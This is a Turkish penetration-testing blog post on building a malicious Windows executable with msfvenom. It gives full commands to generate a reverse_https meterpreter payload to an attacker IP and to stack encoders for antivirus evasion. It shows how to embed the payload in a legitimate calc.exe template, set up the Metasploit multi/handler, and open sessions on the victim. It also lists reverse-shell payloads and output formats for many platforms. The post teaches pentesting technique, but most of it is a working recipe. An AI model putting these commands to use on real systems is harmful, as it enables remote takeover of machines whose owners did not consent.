Msfvenom Aracı Kullanarak Zararlı Yazılım Oluşturma

Sızma testleri sırasında antivirüslerin atlatılarak hedef sistemin ele geçirilmesi kritik bir aşamadır. Bu yazıda, Metasploit tarafından sağlanan msfvenom aracı kullanılarak antivirüslere yakalanmayan zararlı uygulamalar oluşturulacaktır.

Msfvenom; MsfPayload ve MsfEncode modüllerinin birleşimidir. Günümüzde bu modüller için destek kaldırılmış olup, bu modüller yerine Msfvenom kullanılması tavsiye edilmektedir. Msfvenom ile ilgili ayrıntılı bilgi için “-h” seçeneği kullanılabilir.

metasploit -h

evading-anti-virus-detection-using-msfvenom-tool-01

Msfvenom ile zararlı bir exe oluşturulması için örnek bir komut aşağıdaki gibidir:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.130 LPORT=443 -e x86/shikata_ga_nai -f exe -i 5 -b ‘x00’ > /root/Desktop/ZararliUygulama.exe

evading-anti-virus-detection-using-msfvenom-tool-02

 

Not: Örnek bir kullanım da aşağıdaki gibidir:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.130 LPORT=443 -a x86 –platform windows -f raw -e x86/countdown -i 5 | msfvenom -a x86 –platform windows -e x86/shikata_ga_nai -i 5 -b ‘x00’ -f exe -x yasalUygulama_calc.exe -o /root/Desktop/ZararliUygulama.exe

 

Yukarıdaki komut kullanılarak Payload olarak “windows/meterpreter/reverse_https“, Encoder olarak da “x86/shikata_ga_nai ” kullanılmıştır. Encoder ve Payload kavramları hakkında ek bilgi için bakınız.

Kali makinenin /root/Desktop dizininde oluşan uygulama dosyası (ZararliUygulama.exe) istemci bir bilgisayara gönderilir. Bu uygulama tıklandığında bağlantı elde edilmesi için “exploit/multi/handler” modülü kullanılır:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set LHOST 192.168.0.130
msf exploit(handler) > set LPORT 443
msf exploit(handler) > show options

evading-anti-virus-detection-using-msfvenom-tool-03

Exploit işlemi başlatılır ve exe uygulamasının tıklanması için beklenilir.

exploit -j

evading-anti-virus-detection-using-msfvenom-tool-04

Zararlı uygulama tıklandığı durumda Payload çalışır ve bağlantı kurulur.

sessions -l
sessions -i 1
getuid

evading-anti-virus-detection-using-msfvenom-tool-05

Hazırlanan zararlı uygulamanın, günümüzde bir çok antivirüs tarafından yakalandığı görülmektedir. Virüs.mu tarafından gerçekleştirilen tarama sonucunda 20 antivirüsten 16 tanesi tarafından yakalandığı görülmektedir:

evading-anti-virus-detection-using-msfvenom-tool-06

Bunun yanında VirusTotal tarafından gerçekleştirilen tarama sonucunda 55 antivirüsten 38 tanesi tarafından yakalandığı görülmektedir.

evading-anti-virus-detection-using-msfvenom-tool-07

 

Msfvenom ile en çok kullanılan payload’lar ve formatları aşağıdaki gibi listelenebilir.

  • Linux Payload (-p): linux/x86/meterpreter/reverse_tcp
    Linux Format (-f): elf
  • Windows Payload (-p): windows/meterpreter/reverse_tcp
    Windows Format (-f): exe
  • MAC Payload (-p): osx/x86/shell_reverse_tcp
    MAC Format (-f): macho
  • PHP Payload (-p): php/meterpreter_reverse_tcp
    PHP Format (-f): php
  • ASP Payload (-p): windows/meterpreter/reverse_tcp
    ASP Format (-f): asp
  • JSP Payload (-p): java/jsp_shell_reverse_tcp
    JSP Format (-f): raw
  • WAR Payload (-p): java/jsp_shell_reverse_tcp
    WAR Format (-f): war
  • Python Payload (-p): cmd/unix/reverse_python
    Python Format (-f): raw
  • Bash Payload (-p): cmd/unix/reverse_bash
    Bash Format (-f): raw
  • Perl Payload (-p): cmd/unix/reverse_perl
    Perl Format (-f): raw

 

 

Kaynak:

http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/

Create Exploit Using Msfvenom to Hack Windows 7 SP1


http://www.kursatoguzhanakinci.com/2015/07/msfvenom-kullanm-detayl.html

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.